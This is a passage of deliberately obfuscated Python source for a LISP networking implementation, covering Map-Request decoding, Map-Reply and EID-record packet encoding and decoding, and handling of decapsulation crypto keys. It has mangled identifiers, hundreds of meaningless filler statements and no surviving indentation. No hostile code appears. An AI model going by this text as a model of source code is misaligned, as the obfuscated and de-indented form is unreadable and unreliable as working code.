self . rloc_probe = True if ( oOOOoOO & 0x02000000 ) else False
self . smr_bit = True if ( oOOOoOO & 0x01000000 ) else False
self . pitr_bit = True if ( oOOOoOO & 0x00800000 ) else False
self . smr_invoked_bit = True if ( oOOOoOO & 0x00400000 ) else False
self . mobile_node = True if ( oOOOoOO & 0x00200000 ) else False
self . xtr_id_present = True if ( oOOOoOO & 0x00100000 ) else False
self . local_xtr = True if ( oOOOoOO & 0x00004000 ) else False
self . dont_reply_bit = True if ( oOOOoOO & 0x00002000 ) else False
self . itr_rloc_count = ( ( oOOOoOO >> 8 ) & 0x1f )
self . record_count = oOOOoOO & 0xff
self . nonce = OOO0O0O [ 0 ]
if 47 - 47: OoOoOO00 - I1Ii111 + IiII . II111iiii / oO0o / i11iIiiIii
if 28 - 28: I1IiiI . o0oOOo0O0Ooo + OoO0O00
if 100 - 100: oO0o + II111iiii / IiII / i1IIi / Ii1I / O0
if 50 - 50: Ii1I + Ii1I
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
if 51 - 51: I1ii11iIi11i / OoooooooOO * IiII
if 78 - 78: iII111i / I1ii11iIi11i . i11iIiiIii
oOoOo000Ooooo = struct . calcsize ( "H" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 69 - 69: I11i - II111iiii
O0ooO0O00oo0 = struct . unpack ( "H" , packet [ : oOoOo000Ooooo ] )
self . source_eid . afi = socket . ntohs ( O0ooO0O00oo0 [ 0 ] )
packet = packet [ oOoOo000Ooooo : : ]
if 66 - 66: I1IiiI . I1IiiI - OoOoOO00 * OoooooooOO * II111iiii + I1IiiI
if ( self . source_eid . afi == LISP_AFI_LCAF ) :
oOoOoOo0O0o = packet
packet = self . source_eid . lcaf_decode_iid ( packet )
if ( packet == None ) :
packet = self . lcaf_decode_json ( oOoOoOo0O0o )
if ( packet == None ) : return ( None )
if 46 - 46: II111iiii - Oo0Ooo + o0oOOo0O0Ooo + OOooOOo + IiII * II111iiii
elif ( self . source_eid . afi != LISP_AFI_NONE ) :
packet = self . source_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 42 - 42: Oo0Ooo % I1ii11iIi11i / iII111i
self . source_eid . mask_len = self . source_eid . host_mask_len ( )
if 97 - 97: OOooOOo
oOOooO = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
self . itr_rlocs = [ ]
ooOO0O0OooO0 = self . itr_rloc_count + 1
if 4 - 4: i1IIi / OoO0O00 / i1IIi - oO0o + i11iIiiIii - OoO0O00
while ( ooOO0O0OooO0 != 0 ) :
oOoOo000Ooooo = struct . calcsize ( "H" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 71 - 71: I1Ii111 . OoooooooOO / IiII + oO0o * oO0o % Ii1I
O0ooO0O00oo0 = socket . ntohs ( struct . unpack ( "H" , packet [ : oOoOo000Ooooo ] ) [ 0 ] )
I1IoOO0oOOOOO0 = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
I1IoOO0oOOOOO0 . afi = O0ooO0O00oo0
if 46 - 46: i1IIi + OOooOOo % i11iIiiIii % OoOoOO00
if 21 - 21: iII111i / OOooOOo % IiII
if 51 - 51: I11i + ooOoO0o / I1IiiI
if 3 - 3: iIii1I11I1II1 / OOooOOo % oO0o . Ii1I - Ii1I
if 55 - 55: i11iIiiIii % OoooooooOO + O0
if ( I1IoOO0oOOOOO0 . afi == LISP_AFI_LCAF ) :
OOooo = packet
I11ii1I1 = packet [ oOoOo000Ooooo : : ]
packet = self . lcaf_decode_json ( I11ii1I1 )
if ( packet == None ) : return ( None )
if ( packet == I11ii1I1 ) : packet = OOooo
if 51 - 51: I1ii11iIi11i % OoooooooOO - OoooooooOO . I11i
if 97 - 97: i1IIi % I11i . o0oOOo0O0Ooo * I1IiiI % II111iiii
if 41 - 41: I11i . I1ii11iIi11i
if 69 - 69: O0 * ooOoO0o % ooOoO0o / oO0o
if 2 - 2: oO0o % OoO0O00
if 3 - 3: oO0o / OoO0O00 % i11iIiiIii
if ( I1IoOO0oOOOOO0 . afi != LISP_AFI_LCAF ) :
if ( len ( packet ) < I1IoOO0oOOOOO0 . addr_length ( ) ) : return ( None )
packet = I1IoOO0oOOOOO0 . unpack_address ( packet [ oOoOo000Ooooo : : ] )
if ( packet == None ) : return ( None )
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
if ( oOOooO ) :
self . itr_rlocs . append ( I1IoOO0oOOOOO0 )
ooOO0O0OooO0 -= 1
continue
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
Oo0o = lisp_build_crypto_decap_lookup_key ( I1IoOO0oOOOOO0 , port )
if 78 - 78: I1Ii111 - O0 - I1Ii111 . iIii1I11I1II1 % I1ii11iIi11i . OoooooooOO
if 64 - 64: IiII
if 21 - 21: o0oOOo0O0Ooo - ooOoO0o * OoooooooOO . OoooooooOO
if 17 - 17: OOooOOo - iII111i % I1IiiI * OOooOOo * iIii1I11I1II1 . o0oOOo0O0Ooo
if 58 - 58: oO0o - II111iiii + O0
if ( lisp_nat_traversal and I1IoOO0oOOOOO0 . is_private_address ( ) and source ) : I1IoOO0oOOOOO0 = source
if 54 - 54: iIii1I11I1II1 - IiII - IiII
iiiiiI = lisp_crypto_keys_by_rloc_decap
if ( Oo0o in iiiiiI ) : iiiiiI . pop ( Oo0o )
if 46 - 46: ooOoO0o % OOooOOo + II111iiii * i1IIi
if 81 - 81: oO0o - o0oOOo0O0Ooo + iII111i
if 49 - 49: OoooooooOO
if 74 - 74: OOooOOo - II111iiii
if 66 - 66: i11iIiiIii + I1Ii111 . ooOoO0o
if 46 - 46: I1Ii111 / I1ii11iIi11i
lisp_write_ipc_decap_key ( Oo0o , None )
if 41 - 41: i1IIi % Ii1I + I1Ii111 . Oo0Ooo / iIii1I11I1II1
elif ( self . json_telemetry == None ) :
if 77 - 77: Oo0Ooo . OoO0O00 % O0 - OoO0O00 - Oo0Ooo
if 95 - 95: IiII * II111iiii % o0oOOo0O0Ooo * Oo0Ooo . I11i
if 46 - 46: II111iiii - OoO0O00 % ooOoO0o
if 97 - 97: OoO0O00 . OoOoOO00
OOooo = packet
OOoOOO = lisp_keys ( 1 )
packet = OOoOOO . decode_lcaf ( OOooo , 0 )
if 92 - 92: iIii1I11I1II1 * II111iiii . Oo0Ooo - OoO0O00 . i11iIiiIii - OoO0O00
if ( packet == None ) : return ( None )
if 8 - 8: I1ii11iIi11i * IiII / Oo0Ooo
if 99 - 99: OOooOOo * I1Ii111 . ooOoO0o - i1IIi - I11i % IiII
if 40 - 40: OoOoOO00 % I1Ii111 / I1IiiI + i1IIi
if 53 - 53: I1Ii111
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
LISP_CS_25519_CHACHA ]
if ( OOoOOO . cipher_suite in OoOO0Ooo ) :
if ( OOoOOO . cipher_suite == LISP_CS_25519_CBC or
OOoOOO . cipher_suite == LISP_CS_25519_GCM ) :
III11II111 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 81 - 81: O0 % o0oOOo0O0Ooo / Ii1I / ooOoO0o . i11iIiiIii + IiII
if ( OOoOOO . cipher_suite == LISP_CS_25519_CHACHA ) :
III11II111 = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 29 - 29: ooOoO0o
else :
III11II111 = lisp_keys ( 1 , do_poly = False , do_curve = False ,
do_chacha = False )
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
packet = III11II111 . decode_lcaf ( OOooo , 0 )
if ( packet == None ) : return ( None )
if 22 - 22: i1IIi
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
O0ooO0O00oo0 = struct . unpack ( "H" , packet [ : oOoOo000Ooooo ] ) [ 0 ]
I1IoOO0oOOOOO0 . afi = socket . ntohs ( O0ooO0O00oo0 )
if ( len ( packet ) < I1IoOO0oOOOOO0 . addr_length ( ) ) : return ( None )
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
packet = I1IoOO0oOOOOO0 . unpack_address ( packet [ oOoOo000Ooooo : : ] )
if ( packet == None ) : return ( None )
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
if ( oOOooO ) :
self . itr_rlocs . append ( I1IoOO0oOOOOO0 )
ooOO0O0OooO0 -= 1
continue
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
Oo0o = lisp_build_crypto_decap_lookup_key ( I1IoOO0oOOOOO0 , port )
if 88 - 88: OOooOOo
IIiII1i = None
if ( lisp_nat_traversal and I1IoOO0oOOOOO0 . is_private_address ( ) and source ) : I1IoOO0oOOOOO0 = source
if 77 - 77: Ii1I - i11iIiiIii * I1Ii111 / iIii1I11I1II1 + i1IIi . O0
if 20 - 20: OoO0O00 / OoOoOO00 . oO0o + O0
if ( Oo0o in lisp_crypto_keys_by_rloc_decap ) :
O0o0O0 = lisp_crypto_keys_by_rloc_decap [ Oo0o ]
IIiII1i = O0o0O0 [ 1 ] if O0o0O0 and O0o0O0 [ 1 ] else None
if 100 - 100: O0 / OOooOOo - ooOoO0o
if 15 - 15: iII111i - O0 - OoooooooOO
iiiiIIiiII1Iii1 = True
if ( IIiII1i ) :
if ( IIiII1i . compare_keys ( III11II111 ) ) :
self . keys = [ None , IIiII1i , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( Oo0o , False ) ) )
if 93 - 93: OoOoOO00 % Ii1I / Ii1I - ooOoO0o - IiII % ooOoO0o
else :
iiiiIIiiII1Iii1 = False
IiIIiI1i1IIiI = bold ( "Remote decap-rekeying" , False )
lprint ( "{} for RLOC {}" . format ( IiIIiI1i1IIiI , red ( Oo0o ,
False ) ) )
III11II111 . copy_keypair ( IIiII1i )
III11II111 . uptime = IIiII1i . uptime
IIiII1i = None
if 75 - 75: I1IiiI % II111iiii * oO0o % i1IIi % OOooOOo
if 93 - 93: OoOoOO00
if 48 - 48: i11iIiiIii
if ( IIiII1i == None ) :
self . keys = [ None , III11II111 , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
III11II111 . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( Oo0o , False ) ) )
elif ( III11II111 . remote_public_key != None ) :
if ( iiiiIIiiII1Iii1 ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# i11iIiiIii % I1IiiI
red ( Oo0o , False ) ) )
if 90 - 90: II111iiii
III11II111 . compute_shared_key ( "decap" )
III11II111 . add_key_by_rloc ( Oo0o , False )
if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
if 71 - 71: i1IIi / I11i
self . itr_rlocs . append ( I1IoOO0oOOOOO0 )
ooOO0O0OooO0 -= 1
if 14 - 14: OoooooooOO
if 99 - 99: o0oOOo0O0Ooo * o0oOOo0O0Ooo
oOoOo000Ooooo = struct . calcsize ( "BBH" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 6 - 6: i11iIiiIii + oO0o % ooOoO0o + i11iIiiIii - OOooOOo
o00o0Ooo , ooOoO00 , O0ooO0O00oo0 = struct . unpack ( "BBH" , packet [ : oOoOo000Ooooo ] )
self . subscribe_bit = ( o00o0Ooo & 0x80 )
self . target_eid . afi = socket . ntohs ( O0ooO0O00oo0 )
packet = packet [ oOoOo000Ooooo : : ]
if 12 - 12: iII111i . oO0o % IiII * OoooooooOO . IiII
self . target_eid . mask_len = ooOoO00
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , iIi = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( iIi ) : self . target_group = iIi
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ oOoOo000Ooooo : : ]
if 34 - 34: OoooooooOO
return ( packet )
if 40 - 40: I1ii11iIi11i . OoO0O00
if 30 - 30: ooOoO0o % I1IiiI . oO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 48 - 48: OoOoOO00
if 28 - 28: I11i / O0 * IiII - I1Ii111 % IiII
def encode_xtr_id ( self , packet ) :
OooOooo00OOO0o = self . xtr_id >> 64
II1iIIiIII = self . xtr_id & 0xffffffffffffffff
OooOooo00OOO0o = byte_swap_64 ( OooOooo00OOO0o )
II1iIIiIII = byte_swap_64 ( II1iIIiIII )
packet += struct . pack ( "QQ" , OooOooo00OOO0o , II1iIIiIII )
return ( packet )
if 8 - 8: I11i / I1ii11iIi11i % I1ii11iIi11i % Ii1I + iII111i
if 100 - 100: OoO0O00
def decode_xtr_id ( self , packet ) :
oOoOo000Ooooo = struct . calcsize ( "QQ" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
packet = packet [ len ( packet ) - oOoOo000Ooooo : : ]
OooOooo00OOO0o , II1iIIiIII = struct . unpack ( "QQ" , packet [ : oOoOo000Ooooo ] )
OooOooo00OOO0o = byte_swap_64 ( OooOooo00OOO0o )
II1iIIiIII = byte_swap_64 ( II1iIIiIII )
self . xtr_id = ( OooOooo00OOO0o << 64 ) | II1iIIiIII
return ( True )
if 25 - 25: I1Ii111 - ooOoO0o + Oo0Ooo . I1IiiI % iIii1I11I1II1
if 49 - 49: i1IIi + OoO0O00 + iII111i / Oo0Ooo
if 5 - 5: i11iIiiIii + I11i . IiII
if 9 - 9: i11iIiiIii / iIii1I11I1II1 - I1ii11iIi11i * I1ii11iIi11i
if 99 - 99: I11i
if 64 - 64: iIii1I11I1II1
if 61 - 61: Ii1I % Oo0Ooo + OoOoOO00
if 60 - 60: oO0o . OoooooooOO
if 40 - 40: I11i
if 44 - 44: ooOoO0o
if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
if 97 - 97: I1IiiI / o0oOOo0O0Ooo
if 13 - 13: I1ii11iIi11i
if 72 - 72: Oo0Ooo + IiII / Ii1I * Oo0Ooo
if 41 - 41: OOooOOo - OoOoOO00 . I1IiiI + i11iIiiIii + OoO0O00 * iII111i
if 85 - 85: OoO0O00 + II111iiii
if 87 - 87: OoO0O00
if 93 - 93: OoooooooOO
if 80 - 80: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii / OOooOOo + oO0o
if 10 - 10: OoO0O00 . OoO0O00 + O0
if 13 - 13: i1IIi . I1IiiI
if 45 - 45: ooOoO0o % I11i
if 37 - 37: iII111i
if 70 - 70: O0 + iIii1I11I1II1 % O0 * o0oOOo0O0Ooo - Oo0Ooo - ooOoO0o
if 94 - 94: i1IIi + IiII / OoooooooOO - oO0o / OOooOOo / OoOoOO00
if 55 - 55: OOooOOo
if 5 - 5: I11i / OoOoOO00
if 48 - 48: i1IIi - oO0o . OoooooooOO - OoO0O00 - i1IIi
if 19 - 19: oO0o % Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
class lisp_map_reply ( object ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
if 62 - 62: o0oOOo0O0Ooo % II111iiii
if 22 - 22: oO0o - o0oOOo0O0Ooo
def print_map_reply ( self ) :
i11 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
if 89 - 89: OOooOOo
lprint ( i11 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
# O0 / iII111i
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
if 70 - 70: Oo0Ooo
if 92 - 92: OOooOOo + i1IIi - ooOoO0o
def encode ( self ) :
oOOOoOO = ( LISP_MAP_REPLY << 28 ) | self . record_count
oOOOoOO |= self . hop_count << 8
if ( self . rloc_probe ) : oOOOoOO |= 0x08000000
if ( self . echo_nonce_capable ) : oOOOoOO |= 0x04000000
if ( self . security ) : oOOOoOO |= 0x02000000
if 13 - 13: iII111i
OO0Oo00OO0oo = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OO0Oo00OO0oo += struct . pack ( "Q" , self . nonce )
return ( OO0Oo00OO0oo )
if 79 - 79: OoooooooOO / OoO0O00 % Ii1I - OoOoOO00 * i1IIi + I1Ii111
if 42 - 42: i11iIiiIii % I1Ii111 + i11iIiiIii % i11iIiiIii % I1ii11iIi11i
def decode ( self , packet ) :
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 6 - 6: oO0o . o0oOOo0O0Ooo / I1IiiI
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
oOOOoOO = oOOOoOO [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if 64 - 64: iII111i
Iii1iIII1Iii = "Q"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 65 - 65: O0 / II111iiii * IiII % Ii1I + o0oOOo0O0Ooo
OOO0O0O = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
packet = packet [ oOoOo000Ooooo : : ]
if 43 - 43: I1Ii111 + OoO0O00 * OoooooooOO
oOOOoOO = socket . ntohl ( oOOOoOO )
self . rloc_probe = True if ( oOOOoOO & 0x08000000 ) else False
self . echo_nonce_capable = True if ( oOOOoOO & 0x04000000 ) else False
self . security = True if ( oOOOoOO & 0x02000000 ) else False
self . hop_count = ( oOOOoOO >> 8 ) & 0xff
self . record_count = oOOOoOO & 0xff
self . nonce = OOO0O0O [ 0 ]
if 85 - 85: iII111i + OOooOOo
if ( self . nonce in lisp_crypto_keys_by_nonce ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
return ( packet )
if 53 - 53: Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
if 60 - 60: I1Ii111 * iII111i / OoooooooOO * Oo0Ooo
if 47 - 47: iII111i + o0oOOo0O0Ooo % iIii1I11I1II1 * OoOoOO00
if 65 - 65: OOooOOo . II111iiii * i11iIiiIii + OOooOOo
if 99 - 99: I1ii11iIi11i % Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
if 84 - 84: IiII
if 42 - 42: O0 . I1Ii111 / I11i
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
if 1 - 1: o0oOOo0O0Ooo
if 34 - 34: o0oOOo0O0Ooo + OOooOOo . OoO0O00 + I1IiiI + OoooooooOO
if 90 - 90: Ii1I / OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
if 27 - 27: II111iiii + i11iIiiIii
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
if 66 - 66: oO0o / OOooOOo / iII111i
if 5 - 5: I1Ii111 . oO0o
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
class lisp_eid_record ( object ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . record_ttl = 0
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
return ( green ( self . eid . print_sg ( self . group ) , False ) )
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
def print_ttl ( self ) :
O0O00O = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
O0O00O = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " hours"
else :
O0O00O = str ( O0O00O ) + " mins"
if 51 - 51: Oo0Ooo . Oo0Ooo
return ( O0O00O )
if 34 - 34: I1ii11iIi11i - i11iIiiIii
if 43 - 43: iIii1I11I1II1
def store_ttl ( self ) :
O0O00O = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : O0O00O = self . record_ttl & 0x7fffffff
return ( O0O00O )
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
def print_record ( self , indent , ddt ) :
oO00O0o0Oo = ""
I1IIiIiIIiIiI = ""
IIi1iiIII11 = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
IIi1iiIII11 = lisp_map_referral_action_string [ self . action ]
IIi1iiIII11 = bold ( IIi1iiIII11 , False )
oO00O0o0Oo = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
I1IIiIiIIiIiI = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
IIi1iiIII11 = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
IIi1iiIII11 = bold ( IIi1iiIII11 , False )
if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
if 61 - 61: I11i / OOooOOo
if 85 - 85: OoOoOO00 - I11i . OoOoOO00 . OoOoOO00
if 62 - 62: IiII % OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % iII111i
O0ooO0O00oo0 = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
i11 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
if 66 - 66: I1IiiI . OOooOOo - OoO0O00 % Oo0Ooo * o0oOOo0O0Ooo - oO0o
lprint ( i11 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
IIi1iiIII11 , "auth" if ( self . authoritative is True ) else "non-auth" ,
oO00O0o0Oo , I1IIiIiIIiIiI , self . map_version , O0ooO0O00oo0 ,
green ( self . print_prefix ( ) , False ) ) )
if 68 - 68: I11i - i11iIiiIii / o0oOOo0O0Ooo + ooOoO0o / I1IiiI
if 31 - 31: I1Ii111 . OoooooooOO . i1IIi
def encode ( self ) :
oOoO0OooO0O = self . action << 13
if ( self . authoritative ) : oOoO0OooO0O |= 0x1000
if ( self . ddt_incomplete ) : oOoO0OooO0O |= 0x800
if 45 - 45: IiII
if 24 - 24: oO0o % o0oOOo0O0Ooo + ooOoO0o / II111iiii - ooOoO0o * iII111i
if 43 - 43: iII111i * i1IIi . I1IiiI . OoOoOO00 / IiII - Oo0Ooo
if 95 - 95: OoooooooOO % OOooOOo * OOooOOo
O0ooO0O00oo0 = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( O0ooO0O00oo0 < 0 ) : O0ooO0O00oo0 = LISP_AFI_LCAF
I1iiIiI1II1ii = ( self . group . is_null ( ) == False )
if ( I1iiIiI1II1ii ) : O0ooO0O00oo0 = LISP_AFI_LCAF
if 10 - 10: O0 % I11i + I1ii11iIi11i - i11iIiiIii % i1IIi + II111iiii
iii1IOO00OOOO00oOO = ( self . signature_count << 12 ) | self . map_version
ooOoO00 = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
if 56 - 56: IiII * Ii1I . II111iiii / OoOoOO00
OO0Oo00OO0oo = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , ooOoO00 , socket . htons ( oOoO0OooO0O ) ,
socket . htons ( iii1IOO00OOOO00oOO ) , socket . htons ( O0ooO0O00oo0 ) )
if 70 - 70: I1ii11iIi11i
if 82 - 82: OoO0O00 + i11iIiiIii
if 100 - 100: iIii1I11I1II1 % OOooOOo + ooOoO0o * Ii1I
if 3 - 3: ooOoO0o
if ( I1iiIiI1II1ii ) :
OO0Oo00OO0oo += self . eid . lcaf_encode_sg ( self . group )
return ( OO0Oo00OO0oo )
if 64 - 64: I1ii11iIi11i % Oo0Ooo - iIii1I11I1II1 % OoO0O00 * iIii1I11I1II1 + I11i
if 99 - 99: i11iIiiIii * I11i * I1Ii111
if 28 - 28: iIii1I11I1II1 * iIii1I11I1II1 * ooOoO0o % I1ii11iIi11i / i11iIiiIii
if 90 - 90: OoO0O00 + i1IIi
if 43 - 43: O0 % oO0o * I1IiiI
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
OO0Oo00OO0oo = OO0Oo00OO0oo [ 0 : - 2 ]
OO0Oo00OO0oo += self . eid . address . encode_geo ( )
return ( OO0Oo00OO0oo )
if 64 - 64: II111iiii + i11iIiiIii
if 17 - 17: O0 * I1IiiI
if 40 - 40: iIii1I11I1II1 * iII111i % iIii1I11I1II1
if 39 - 39: i1IIi . Ii1I - Oo0Ooo
if 91 - 91: I1IiiI - OoooooooOO - OoooooooOO
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) :
OO0Oo00OO0oo += self . eid . lcaf_encode_iid ( )
return ( OO0Oo00OO0oo )
if 69 - 69: iII111i * i11iIiiIii / i1IIi
if 86 - 86: I1IiiI % I11i * O0 + i1IIi % I1Ii111
if 97 - 97: II111iiii * OoOoOO00 - I1Ii111 / i11iIiiIii / OoOoOO00
if 25 - 25: Oo0Ooo / Oo0Ooo
if 74 - 74: OOooOOo
OO0Oo00OO0oo += self . eid . pack_address ( )
return ( OO0Oo00OO0oo )
if 30 - 30: O0 . Ii1I / o0oOOo0O0Ooo + I1IiiI - O0
if 88 - 88: i11iIiiIii
def decode ( self , packet ) :
Iii1iIII1Iii = "IBBHHH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 33 - 33: OoO0O00 + O0
self . record_ttl , self . rloc_count , self . eid . mask_len , oOoO0OooO0O , self . map_version , self . eid . afi = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 20 - 20: o0oOOo0O0Ooo % I11i . ooOoO0o - i1IIi . O0
if 10 - 10: i1IIi
if 49 - 49: I1Ii111 - Ii1I . O0
self . record_ttl = socket . ntohl ( self . record_ttl )
oOoO0OooO0O = socket . ntohs ( oOoO0OooO0O )
self . action = ( oOoO0OooO0O >> 13 ) & 0x7
self . authoritative = True if ( ( oOoO0OooO0O >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( oOoO0OooO0O >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ oOoOo000Ooooo : : ]
if 46 - 46: OOooOOo
if 64 - 64: I1IiiI / OoOoOO00
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , o0o0o = self . eid . lcaf_decode_eid ( packet )
if ( o0o0o ) : self . group = o0o0o
self . group . instance_id = self . eid . instance_id
return ( packet )
if 79 - 79: OoO0O00
if 4 - 4: I11i / I1ii11iIi11i
